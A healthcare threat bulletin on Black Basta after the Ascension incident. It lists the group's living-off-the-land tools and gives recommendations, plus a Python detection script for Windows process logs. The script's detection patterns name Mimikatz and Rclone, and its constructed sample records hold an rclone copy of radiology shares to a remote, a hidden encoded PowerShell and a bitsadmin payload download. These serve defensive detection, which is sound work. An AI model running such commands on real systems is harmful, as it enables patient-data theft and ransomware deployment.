Alert essentials:
The following information is derived from documentation rated as “TLP: CLEAR,” which may be shared without restriction.
In the wake of the cybersecurity event affecting Ascension, open-source reporting has attributed the attack to Black Basta, a known threat group.
CISA has released additional IOCs under its #StopRansomware campaign (also included in the References section below).
Detailed Threat Description:
Updated IOCs for the Black Basta group have been published under CISA’s #StopRansomware campaign. Tools known to be used by the group include but are not limited to:
- BITSAdmin
- Cobalt Strike
- Mimikatz
- PsExec
- PowerShell
- Rclone
- ScreenConnect
- WinSCP
Although the advisory provides a more detailed description and additional IOCs, the tool list alone shows that Black Basta relies heavily on living-off-the-land techniques: most of these are legitimate administration, remote-access, and file-transfer utilities that are often already present in the environment, so their execution blends in with normal operations and is difficult to detect on a hash or signature basis. Detection has to key on context, such as the parent process, the command-line arguments, and the account involved.
Their most common initial-access methods are social engineering (phishing and vishing) and exploitation of the recently disclosed ConnectWise ScreenConnect vulnerabilities.
Note: Fortified’s original bulletin on the Ascension Health situation was published and distributed last week.
Impacts on Healthcare Organizations:
These tactics are the initial-access stage of an attack chain. At best, a successful initial access means unauthorized access to email or a remote-access application, which by itself is a potentially disclosable event.
In the worst case, the attacker escalates privileges, exfiltrates data from the environment, and deploys a malicious payload, often ending in a ransomware outbreak. Such incidents severely threaten patient safety and operational stability.
Recommendations
Engineering recommendations:
- Apply IOCs to monitoring and detection/response tools
- Review access policies and remove or disable unneeded, misconfigured, or inactive accounts
- Implement application allow-listing (application control) where possible to minimize the introduction and execution of unapproved applications and tools
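As an added example (not part of this bulletin or of CISA's advisory), the following Python pass runs over constructed process-creation records and flags the tools listed in the threat description above, in the spirit of the "apply IOCs to monitoring and detection/response tools" recommendation. The log lines, image names, command-line patterns, parent-process heuristic, and severities are this example's own assumptions, not CISA-published IOCs: tools with routine administrative use (PowerShell, BITSAdmin, WinSCP) only fire when the command line shows an abuse pattern, and ScreenConnect is assumed not to be an approved remote-support tool in the environment. The published IOCs themselves should still be loaded into the detection platform separately.

```python
"""Detection pass over constructed Windows process-creation records for the
living-off-the-land tools named in the bulletin. The log lines, image names,
command-line patterns and severities are this example's own assumptions, not
CISA-published IOCs."""
import re
from dataclasses import dataclass
from typing import Optional

# image name -> (tool, severity, optional command-line pattern).
# Tools with routine admin use only fire when the command line shows an abuse
# pattern; that keeps the rule from paging on every PowerShell script.
RULES: dict[str, tuple[str, str, Optional[str]]] = {
    "mimikatz.exe": ("Mimikatz", "high", None),
    "psexec.exe": ("PsExec", "high", None),
    "psexesvc.exe": ("PsExec", "high", None),      # service stub PsExec drops on the target
    "rclone.exe": ("Rclone", "high", r"\b(copy|sync|move)\b.*\s[\w-]{2,}:"),  # local path -> named remote
    "bitsadmin.exe": ("BITSAdmin", "medium", r"/(transfer|addfile|setnotifycmdline)\b"),
    "powershell.exe": ("PowerShell", "medium",
                       r"-e(nc|ncodedcommand)?\b|downloadstring|\biex\b|invoke-expression|-w(indowstyle)?\s+hidden"),
    "winscp.exe": ("WinSCP", "medium", r"/command\b|\b(scp|sftp|ftps?)://"),  # scripted/CLI transfers only
    # Assumption: ScreenConnect is not an approved remote-support tool in this environment.
    "screenconnect.clientservice.exe": ("ScreenConnect", "medium", None),
}
RULES["pwsh.exe"] = RULES["powershell.exe"]

# A mail client, Office app or browser spawning an admin tool is the classic
# phishing-payload shape, so any hit with one of these parents is raised to high.
PHISHING_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "msedge.exe", "chrome.exe"}

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    tool: str
    severity: str
    reason: str


def parse_event(line: str) -> dict[str, str]:
    """Parse one key=value record; quoted values may contain spaces."""
    return {k: quoted or bare for k, quoted, bare in KV_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict[str, str]) -> Optional[Finding]:
    image = basename(event.get("image", ""))
    rule = RULES.get(image)
    if rule is None:
        return None
    tool, severity, pattern = rule
    if pattern and not re.search(pattern, event.get("cmd", ""), re.IGNORECASE):
        return None                      # watched tool, but a benign-looking invocation
    parent = basename(event.get("parent", ""))
    reason = f"{image} launched by {parent}"
    if parent in PHISHING_PARENTS:
        severity, reason = "high", reason + " (user-facing app spawning an admin tool)"
    return Finding(event.get("ts", ""), event.get("host", ""), event.get("user", ""),
                   tool, severity, reason)


def scan(lines: list[str]) -> list[Finding]:
    return [f for f in (evaluate(parse_event(line)) for line in lines) if f is not None]


# Constructed sample records (not real telemetry). The fourth and sixth lines
# are benign uses of watched tools and should not fire.
SAMPLE_LOG = [
    r'ts=2024-05-13T02:14:09Z host=WS-0412 user=CORP\jdoe parent="C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -nop -w hidden -enc SQBFAFgA"',
    r'ts=2024-05-13T02:31:55Z host=SRV-FILE01 user="NT AUTHORITY\SYSTEM" parent="C:\Windows\System32\services.exe" image="C:\Windows\PSEXESVC.exe" cmd="C:\Windows\PSEXESVC.exe"',
    r'ts=2024-05-13T03:02:40Z host=SRV-FILE01 user=CORP\svc_backup parent="C:\Windows\System32\cmd.exe" image="C:\Users\Public\rclone.exe" cmd="rclone.exe copy C:\Shares\Radiology mega:exfil --transfers 32 -q"',
    r'ts=2024-05-13T08:10:02Z host=WS-0077 user=CORP\itadmin parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"',
    r'ts=2024-05-13T03:15:27Z host=WS-0412 user=CORP\jdoe parent="C:\Windows\System32\svchost.exe" image="C:\Windows\System32\bitsadmin.exe" cmd="bitsadmin.exe /transfer upd /download /priority high http://example.invalid/u.bin C:\Users\Public\u.exe"',
    r'ts=2024-05-13T09:44:13Z host=WS-0077 user=CORP\itadmin parent="C:\Windows\explorer.exe" image="C:\Program Files (x86)\WinSCP\WinSCP.exe" cmd="C:\Program Files (x86)\WinSCP\WinSCP.exe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity:6}] {f.ts} {f.host} {f.user}: {f.tool}: {f.reason}")
```

Run as-is, the script reports four hits (the encoded PowerShell spawned by Outlook, the PsExec service stub, the rclone copy to a cloud remote, and the BITSAdmin download) and stays silent on the signed inventory script and the interactive WinSCP launch. The design point is that, for living-off-the-land tools, the image name alone is not an alert; the parent process and command line are what separate an administrator's routine work from an intrusion, and those are the fields to collect and key on when the published IOCs are loaded.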
Leadership / program recommendations:
- Review Incident Response procedures and consider coordinating a micro tabletop exercise to run internally with your respective teams
- Keep the conversation around Incident Response (IR) preparedness active and consider prioritizing changes where necessary to harden your environment
- Be on the lookout for updated IOCs from reputable sources
Fortified recommends applying patches and updates where possible and only after adequate testing in a development environment to ensure stability and compliance with organizational change management policies.
References:
- https://www.ic3.gov/Media/News/2024/240511.pdf
- https://www.securityweek.com/black-basta-ransomware-hit-over-500-organizations
- https://fortifiedhealthsecurity.com/threat-bulletin/ascension-incident
- https://fortifiedhealthsecurity.com/blog/living-off-the-land-attacks
- https://fortifiedhealthsecurity.com/blog/healthcare-social-engineering
- https://fortifiedhealthsecurity.com/threat-bulletin/screenconnect-change-healthcare
- On-demand recording of Fortified’s tabletop exercise webinar
- https://fortifiedhealthsecurity.com/blog/hospital-cyber-attack